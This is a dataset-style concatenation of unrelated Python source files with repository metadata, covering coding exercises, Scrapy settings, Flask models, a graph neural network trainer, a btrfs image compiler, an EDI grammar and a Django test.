6061ebee9fbce8eb5b48ed7ccd2aecb196156598
|
/modulo07-funcoes/exercicios/exercicio04.py
|
5ebbfcd3edf545e7ffdc636929ca0276708ef06c
|
[] |
no_license
|
DarioCampagnaCoutinho/logica-programacao-python
|
fdc64871849bea5f5bbf2c342db5fda15778110b
|
b494bb6ef226c89f4bcfc66f964987046aba692d
|
refs/heads/master
| 2023-02-24T11:45:29.551278 | 2021-01-26T22:02:49 | 2021-01-26T22:02:49 | 271,899,650 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 141 |
py
|
def aumento(numero, valor):
resultado = numero * valor / 100
return resultado + numero
resultado = aumento(100, 50)
print(resultado)
|
[
"[email protected]"
] | |
b936c098695eb03ec4c9abb82e78537b33edc5f3
|
b7a2a80843fa5141ffb9c7b4439f1d2ac713af30
|
/UT2_Morsen.py
|
f0f71ad6765a17297467d402ad1566da64d52c4e
|
[] |
no_license
|
wunnox/python_grundlagen
|
df1bc2b9b1b561bd6733ccc25305e799a48e714e
|
fa84d7aae7332a7acbb3ba7ff0fe2216cc345fc0
|
refs/heads/master
| 2023-05-01T12:19:23.208445 | 2023-04-16T11:29:01 | 2023-04-16T11:29:01 | 222,099,539 | 2 | 3 | null | 2019-12-19T10:56:43 | 2019-11-16T12:57:54 |
Python
|
UTF-8
|
Python
| false | false | 450 |
py
|
#!/usr/local/bin/python3
####################################################
#
# Exercise UT2_Morsen.py:
# Write a program that outputs a text as Morse code
# based on a Morse table. Use the module
# UT2_Morsecodes.py for this.
#
####################################################
import UT2_Morsecodes as mc
w = input('-> ')  # read the word to encode
w = w.replace(' ', '_')
for l in w:
print(mc.morse(l), end=' ')
print()
|
[
"[email protected]"
] | |
1c3ea9c37220f04f5ec059b8d964947f7d2508f6
|
c31e69b763e1b52d3cefa4f5a49432ae966f22d0
|
/day29/mySpider/mySpider/settings.py
|
4e3e3faf4c4eeff43f7ccf6f99bfd3381a22506f
|
[] |
no_license
|
lvah/201901python
|
cbda174a3c97bc5a2f732c8e16fc7cf8451522d2
|
7bffe04a846f2df6344141f576820730a7bbfa6a
|
refs/heads/master
| 2022-12-13T09:49:29.631719 | 2019-04-06T09:48:33 | 2019-04-06T09:48:33 | 165,477,671 | 3 | 0 | null | 2022-12-08T04:57:01 | 2019-01-13T07:23:44 |
HTML
|
UTF-8
|
Python
| false | false | 3,413 |
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for mySpider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'mySpider'
SPIDER_MODULES = ['mySpider.spiders']
NEWSPIDER_MODULE = 'mySpider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'mySpider (+http://www.yourdomain.com)'
# Obey robots.txt rules
# ROBOTSTXT_OBEY = True
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
MOOCFilename = "mooc.txt"
ITEM_PIPELINES = {
    # pipeline class path: priority, 0~1000; the smaller the number, the higher the priority
'mySpider.pipelines.MyspiderPipeline': 300,
'mySpider.pipelines.CsvPipeline': 400,
'mySpider.pipelines.MysqlPipeline': 500,
'mySpider.pipelines.ImagePipeline': 200,
}
IMAGES_STORE = '/root/PycharmProjects/day29/mySpider/img'
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
f8bf11e12bc1581ed30ac99f941e2bf0f33f766b
|
80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019
|
/data/HackerRank-ProblemSolving/Counting Valleys.py
|
8dd7bd82fe261f99bf7584a8856d457b1d55009b
|
[] |
no_license
|
Ritvik19/CodeBook
|
ef7764d89b790e902ede5802f36d5ca910d8a50e
|
2b4ed7938bbf156553d6ba5cba6216449528f0fc
|
refs/heads/master
| 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 523 |
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
def countingValleys(n, s):
    count = 0
    topography = 0  # current altitude relative to sea level
    for step in s:
        if step == 'D':
            topography -= 1
        else:
            topography += 1
            # a valley ends exactly when we step up *onto* sea level
            if topography == 0:
                count += 1
    return count
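# Sample from the problem statement: countingValleys(8, 'UDDDUDUU') == 1
# (the walk dips below sea level exactly once).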
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
s = input()
result = countingValleys(n, s)
fptr.write(str(result) + '\n')
fptr.close()
|
[
"[email protected]"
] | |
ffd754dfcd3f8ce81ed63d9d1957b3c012840687
|
f63d8037abd95550bbf19820bbbf63fe004ea027
|
/apps/auth/models.py
|
e887c3348f0f68c9ec65dc5781584c4c4638ab2f
|
[] |
no_license
|
lsdlab/flask_socketio_celery
|
6595e0fdc6534e4c3988b2e895194ba6f2302c53
|
84870110641feb8e49d9f45271894a66e202b7ec
|
refs/heads/master
| 2020-03-24T20:54:47.793077 | 2018-08-01T04:33:54 | 2018-08-01T04:33:54 | 143,003,268 | 0 | 1 | null | 2018-08-24T01:54:32 | 2018-07-31T11:08:36 |
Python
|
UTF-8
|
Python
| false | false | 2,521 |
py
|
import datetime as dt
from flask_login import UserMixin
from apps.database import (Column, Model, SurrogatePK, db,
reference_col, relationship)
from apps.extensions import bcrypt
class Role(SurrogatePK, Model):
"""A role for a user."""
__tablename__ = 'auth_roles'
name = Column(db.String(80), unique=True, nullable=False)
user_id = reference_col('auth_users', nullable=True)
user = relationship('User', backref='roles')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
"""A user of the app."""
__tablename__ = 'auth_users'
username = Column(db.String(80), unique=True, nullable=False)
email = Column(db.String(80), unique=True, nullable=True)
#: The hashed password
password = Column(db.Binary(128), nullable=False)
created_at = Column(db.DateTime, nullable=False, default=dt.datetime.now)
first_name = Column(db.String(30), nullable=True)
last_name = Column(db.String(30), nullable=True)
active = Column(db.Boolean(), default=False)
is_admin = Column(db.Boolean(), default=False)
sid = Column(db.String(80), nullable=True, default='')
def __init__(self, username, password=None, **kwargs):
"""Create instance."""
db.Model.__init__(self, username=username, **kwargs)
if password:
self.set_password(password)
else:
self.password = None
def set_password(self, password):
"""Set password."""
self.password = bcrypt.generate_password_hash(password)
def check_password(self, value):
"""Check password."""
return bcrypt.check_password_hash(self.password, value)
@property
def full_name(self):
"""Full user name."""
return '{0} {1}'.format(self.first_name, self.last_name)
def __repr__(self):
"""Represent instance as a unique string."""
return '<User({username!r})>'.format(username=self.username)
def to_json(self):
return {
'id': self.id,
'username': self.username,
'email': self.email,
'active': self.active,
'is_admin': self.is_admin,
'sid': self.sid,
'created_at': self.created_at.strftime("%Y-%m-%d %H:%M:%S")
}
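# Usage sketch (assumes an application context with the bcrypt extension
# initialised; the values are illustrative):
#   user = User(username='alice', password='s3cret', email='alice@example.com')
#   assert user.check_password('s3cret')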
|
[
"[email protected]"
] | |
89588f1507285e3312add597434439152e7280fa
|
7a3696072a511acc4974bb76004b315a35a106b7
|
/SS-GCNs/SS-GMNN-GraphMix/GraphMix-clu/trainer.py
|
0a339f94160ac998022247c886c38f0cec71a1bd
|
[
"MIT"
] |
permissive
|
xyh97/graph_representation
|
859e9f2ff911058db251fd6547098968960c6739
|
e6967073a951cd029651389d4b76606f9cef7f6c
|
refs/heads/main
| 2023-03-23T00:55:52.763740 | 2021-03-19T17:15:40 | 2021-03-19T17:15:40 | 343,223,074 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,909 |
py
|
import math
import random
import numpy as np
import torch
from torch import nn
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
from torch.optim import Optimizer
bce_loss = nn.BCELoss().cuda()
softmax = nn.Softmax(dim=1).cuda()
class_criterion = nn.CrossEntropyLoss().cuda()
def mixup_criterion(y_a, y_b, lam):
return lambda criterion, pred: lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)
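# e.g. with mixed targets y_a, y_b and a Beta-sampled coefficient lam:
#   loss_fn = mixup_criterion(y_a, y_b, lam)
#   loss = loss_fn(class_criterion, predictions)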
def get_optimizer(name, parameters, lr, weight_decay=0):
if name == 'sgd':
return torch.optim.SGD(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'rmsprop':
return torch.optim.RMSprop(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adagrad':
return torch.optim.Adagrad(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adam':
return torch.optim.Adam(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adamax':
return torch.optim.Adamax(parameters, lr=lr, weight_decay=weight_decay)
else:
raise Exception("Unsupported optimizer: {}".format(name))
def change_lr(optimizer, new_lr):
for param_group in optimizer.param_groups:
param_group['lr'] = new_lr
class Trainer(object):
def __init__(self, opt, model, partition_labels, ema= True):
partition_num = partition_labels.max() + 1
self.partition_labels = partition_labels.cuda()
self.task_ratio = opt['task_ratio']
self.loss_func = nn.CrossEntropyLoss()
self.opt = opt
self.ema = ema
self.model = model
self.criterion = nn.CrossEntropyLoss()
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
self.ss_classifier = nn.Linear(opt['hidden_dim'], partition_num, bias=False)
if opt['cuda']:
self.criterion.cuda()
self.ss_classifier.cuda()
self.parameters.append(self.ss_classifier.weight)
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def reset(self):
self.model.reset()
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def update(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.train()
self.optimizer.zero_grad()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
loss.backward()
self.optimizer.step()
return loss.item()
def update_soft(self, inputs, target, idx, idx_u):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
logits= self.model(inputs)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
return loss, loss0
def update_soft_aux(self, inputs, target,target_discrete, idx, idx_unlabeled, adj, opt, mixup_layer, idx_u):
"""uses the auxiliary loss as well, which does not use the adjacency information"""
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
idx_unlabeled = idx_unlabeled.cuda()
self.model.train()
self.optimizer.zero_grad()
mixup = True
if mixup == True:
# get the supervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix=mixup_layer)
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
mixed_target = lam*target_a + (1-lam)*target_b
loss = bce_loss(softmax(logits[idx]), mixed_target)
# get the unsupervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx_unlabeled, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix= mixup_layer)
mixed_target = lam*target_a + (1-lam)*target_b
loss_usup = bce_loss(softmax(logits[idx_unlabeled]), mixed_target)
else:
logits = self.model.forward_aux(inputs, target=None, train_idx= idx, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
'''
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0, self.partition_labels)
'''
logits = self.model.forward_aux(inputs, target=None, train_idx= idx_unlabeled, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss_usup = -torch.mean(torch.sum(target[idx_unlabeled] * logits[idx_unlabeled], dim=-1))
return loss, loss_usup, loss0
def evaluate(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.eval()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
preds = torch.max(logits[idx], dim=1)[1]
correct = preds.eq(target[idx]).double()
accuracy = correct.sum() / idx.size(0)
return loss.item(), preds, accuracy.item()
def predict(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def save(self, filename):
params = {
'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()
}
try:
torch.save(params, filename)
except BaseException:
print("[Warning: Saving failed... continuing anyway.]")
def load(self, filename):
try:
checkpoint = torch.load(filename)
except BaseException:
print("Cannot load model from {}".format(filename))
exit()
self.model.load_state_dict(checkpoint['model'])
self.optimizer.load_state_dict(checkpoint['optim'])
|
[
"[email protected]"
] | |
fa3e535aaacaa3dafcb031f0333a8778da9d2e30
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_97/1531.py
|
9246536e333923658ae3a6c8448940cb36f0d831
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,052 |
py
|
def check(x, mn, mx):
global pairs
pcheck = []
x = str(x)
if len(x) == 1:
pass
if len(x) == 2:
if x[0] != x[1]:
first = x[::-1]
if int(first) > int(x):
pcheck.append(int(first))
if len(x) == 3:
second = x[1:]+x[0]
third = x[-1]+x[0:-1]
if second != x and second[0] != '0' and int(second) > int(x):
pcheck.append(int(second))
if third != x and third[0] != '0' and int(third) > int(x):
pcheck.append(int(third))
for item in pcheck:
if item >= mn and item <= mx:
pairs += 1
def recycle(numbers):
global pairs
pairs = 0
parameters = numbers.split()
for x in range(int(parameters[0]), int(parameters[1])+1):
check(x,int(parameters[0]),int(parameters[1]))
testcases.append(pairs)
testcases = []
pairs = 0
f = file('C-small-attempt2.in', 'r')
for line in f:
if len(line.split()) > 1:
recycle(line)
f.close()
f1 = file('outputC.txt', 'w')
for x in range(1, len(testcases)+1):
f1.write("Case #"+str(x)+": "+str(testcases[x-1])+'\n')
f1.close()
|
[
"[email protected]"
] | |
d44c38b442f4ea146ddaa3080d9f72ed2c617fa8
|
025c1cc826722d558d43854f3e319917e199d609
|
/infra_macros/macro_lib/convert/container_image/compiler/compiler.py
|
6cfddefcce8817aa2d14a9321c253ab846c2820a
|
[
"BSD-3-Clause"
] |
permissive
|
martarozek/buckit
|
73440be29a2ce64084016fc395a5a8cc9bc1e602
|
343cc5a5964c1d43902b6a77868652adaefa0caa
|
refs/heads/master
| 2020-03-26T06:07:35.468491 | 2018-08-12T17:34:04 | 2018-08-12T17:45:46 | 144,590,545 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,345 |
py
|
#!/usr/bin/env python3
'''
This is normally invoked by the `image_layer` Buck macro converter.
This compiler builds a btrfs subvolume in
<--subvolumes-dir>/<--subvolume-name>:<subvolume-version>
To do so, it parses `--child-feature-json` and the `--child-dependencies`
that referred therein, creates `ImageItems`, sorts them in dependency order,
and invokes `.build()` to apply each item to actually construct the subvol.
'''
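# Hypothetical invocation (every path and target below is made up):
#   compiler.py --subvolumes-dir /btrfs/subvolumes \
#       --subvolume-name foo --subvolume-version 123 \
#       --child-layer-target //images:foo \
#       --child-feature-json buck-out/foo-feature.json \
#       --child-dependencies //images:base buck-out/base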
import argparse
import itertools
import os
import subprocess
import sys
from subvol_utils import Subvol
from .dep_graph import dependency_order_items
from .items import gen_parent_layer_items
from .items_for_features import gen_items_for_features
from .subvolume_on_disk import SubvolumeOnDisk
# At the moment, the target names emitted by `image_feature` targets seem to
# be normalized the same way as those provided to us by `image_layer`. If
# this were to ever change, this would be a good place to re-normalize them.
def make_target_filename_map(targets_followed_by_filenames):
'Buck query_targets_and_outputs gives us `//target path/to/target/out`'
if len(targets_followed_by_filenames) % 2 != 0:
raise RuntimeError(
f'Odd-length --child-dependencies {targets_followed_by_filenames}'
)
it = iter(targets_followed_by_filenames)
d = dict(zip(it, it))
    # A hacky check to ensure that the target corresponds to the path. We
# can remove this if we absolutely trust the Buck output.
if not all(
t.replace('//', '/').replace(':', '/') in f for t, f in d.items()
):
raise RuntimeError(f'Not every target matches its output: {d}')
return d
def parse_args(args):
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
'--subvolumes-dir', required=True,
help='A directory on a btrfs volume to store the compiled subvolume '
'representing the new layer',
)
parser.add_argument(
'--subvolume-name', required=True,
help='The first part of the subvolume directory name',
)
parser.add_argument(
'--subvolume-version', required=True,
help='The second part of the subvolume directory name',
)
parser.add_argument(
'--parent-layer-json',
help='Path to the JSON output of the parent `image_layer` target',
)
parser.add_argument(
'--child-layer-target', required=True,
help='The name of the Buck target describing the layer being built',
)
parser.add_argument(
'--child-feature-json', required=True,
help='The path of the JSON output of the `image_feature` that was '
'auto-generated for the layer being built',
)
parser.add_argument(
'--child-dependencies',
nargs=argparse.REMAINDER, metavar=['TARGET', 'PATH'], default=(),
help='Consumes the remaining arguments on the command-line, with '
'arguments at positions 1, 3, 5, 7, ... used as Buck target names '
'(to be matched with the targets in per-feature JSON outputs). '
'The argument immediately following each target name must be a '
'path to the output of that target on disk.',
)
return parser.parse_args(args)
def build_image(args):
subvol = Subvol(os.path.join(
args.subvolumes_dir,
f'{args.subvolume_name}:{args.subvolume_version}',
))
for item in dependency_order_items(
itertools.chain(
gen_parent_layer_items(
args.child_layer_target,
args.parent_layer_json,
args.subvolumes_dir,
),
gen_items_for_features(
[args.child_feature_json],
make_target_filename_map(args.child_dependencies),
),
)
):
item.build(subvol)
try:
return SubvolumeOnDisk.from_subvolume_path(
subvol.path().decode(),
args.subvolumes_dir,
args.subvolume_name,
args.subvolume_version,
)
except Exception as ex:
raise RuntimeError(f'Serializing subvolume {subvol.path()}') from ex
if __name__ == '__main__': # pragma: no cover
build_image(parse_args(sys.argv[1:])).to_json_file(sys.stdout)
|
[
"[email protected]"
] | |
3de5136de3696c4e49370d8ef3420a67e721f6b3
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_149/82.py
|
0c7ae5570829193e068ba4471f6d4bad7fb4b56a
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 279 |
py
|
#!/usr/bin/env python
import itertools
def solve(a):
ans=0
while a:
x=min(a)
i=a.index(x)
del a[i]
ans+=min(i,len(a)-i)
return ans
for t in xrange(1, 1 + int(raw_input())):
    n = int(raw_input())
    a = map(int, raw_input().split())
    ans = solve(a)
    print "Case #%d:" % t,
    print ans
|
[
"[email protected]"
] | |
8cfbe05b9aeb068e2eea79df986d823110f9c019
|
899bac17acf97252a33d91af076ff1f16b975210
|
/eduiddashboard/scripts/decode_session.py
|
787b570f274e635d56156b7461f3b6945ebfead4
|
[] |
no_license
|
isabella232/eduid-dashboard
|
91a209f7833f26a7949cecec60df2e501a82f840
|
99cffaa90f41b13ec34f9d057f19630c644df6ee
|
refs/heads/master
| 2023-03-16T05:19:36.184687 | 2018-07-27T12:27:53 | 2018-07-27T12:27:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,090 |
py
|
# -*- coding: utf-8 -*-
import sys
import pprint
from pyramid.paster import bootstrap
from eduid_common.session.session import SessionManager
import logging
logger = logging.getLogger(__name__)
__author__ = 'ft'
"""
Read and decode a session from Redis. Supply the token (id starting with lower-case 'a')
from an existing session.
"""
default_config_file = '/opt/eduid/eduid-dashboard/etc/eduid-dashboard.ini'
def main(token):
env = bootstrap(default_config_file)
settings = env['request'].registry.settings
secret = settings.get('session.secret')
manager = SessionManager(cfg = settings, ttl = 3600, secret = secret)
session = manager.get_session(token = token)
print('Session: {}'.format(session))
print('Data:\n{}'.format(pprint.pformat(dict(session))))
return True
if __name__ == '__main__':
try:
if len(sys.argv) != 2:
print('Syntax: decode_session.py aTOKEN')
sys.exit(1)
res = main(sys.argv[1])
if res:
sys.exit(0)
sys.exit(1)
except KeyboardInterrupt:
pass
|
[
"[email protected]"
] | |
ea2f5c0278cf81ce6a961011b597677d80605caa
|
c6588d0e7d361dba019743cacfde83f65fbf26b8
|
/x12/5030/240005030.py
|
e169346e38e95704c267b8fa6401b8abee37c150
|
[] |
no_license
|
djfurman/bots-grammars
|
64d3b3a3cd3bd95d625a82204c3d89db6934947c
|
a88a02355aa4ca900a7b527b16a1b0f78fbc220c
|
refs/heads/master
| 2021-01-12T06:59:53.488468 | 2016-12-19T18:37:57 | 2016-12-19T18:37:57 | 76,887,027 | 0 | 0 | null | 2016-12-19T18:30:43 | 2016-12-19T18:30:43 | null |
UTF-8
|
Python
| false | false | 1,585 |
py
|
from bots.botsconfig import *
from records005030 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'MZ',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGN', MIN: 1, MAX: 1},
{ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
]},
{ID: 'LX', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'N1', MIN: 0, MAX: 1, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'NTE', MIN: 0, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
{ID: 'L11', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'MS2', MIN: 0, MAX: 99999},
{ID: 'LS', MIN: 0, MAX: 1, LEVEL: [
{ID: 'MAN', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'L11', MIN: 0, MAX: 99999},
{ID: 'AT7', MIN: 0, MAX: 99999},
{ID: 'CD3', MIN: 0, MAX: 99999},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'Q7', MIN: 0, MAX: 99999},
]},
{ID: 'LE', MIN: 1, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
|
[
"[email protected]"
] | |
c70a779cc10fd3ba3fe7aca2d9736f9bcb91c53f
|
d594f3926f6379ef7c382c608cb211f507240420
|
/csunplugged/tests/utils/errors/test_ThumbnailPageNotFoundError.py
|
b73009b6a4421c213fecea7a8dec041baac543c4
|
[
"LicenseRef-scancode-secret-labs-2011",
"MIT",
"OFL-1.1",
"LGPL-2.0-or-later",
"AGPL-3.0-only",
"CC-BY-4.0",
"Apache-2.0",
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
uccser/cs-unplugged
|
0b9151f84dd490d5b90771a3706327a623d39edc
|
363e281ff17cefdef0ec61078b1718eef2eaf71a
|
refs/heads/develop
| 2023-08-25T08:45:29.833025 | 2023-08-22T02:58:35 | 2023-08-22T02:58:35 | 66,315,075 | 200 | 41 |
MIT
| 2023-09-14T02:15:40 | 2016-08-22T23:16:40 |
Python
|
UTF-8
|
Python
| false | false | 958 |
py
|
"""Test class for ThumbnailPageNotFoundError error."""
from django.test import SimpleTestCase
from utils.errors.ThumbnailPageNotFoundError import ThumbnailPageNotFoundError
from unittest.mock import Mock
class ThumbnailPageNotFoundErrorTest(SimpleTestCase):
"""Test class for ThumbnailPageNotFoundError error.
Note: Tests to check if these were raised appropriately
are located where this exception is used.
"""
def test_attributes(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(exception.generator_name, "Name")
def test_string(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(
exception.__str__(),
"Name did not return a page with a designated thumbnail."
)
|
[
"[email protected]"
] |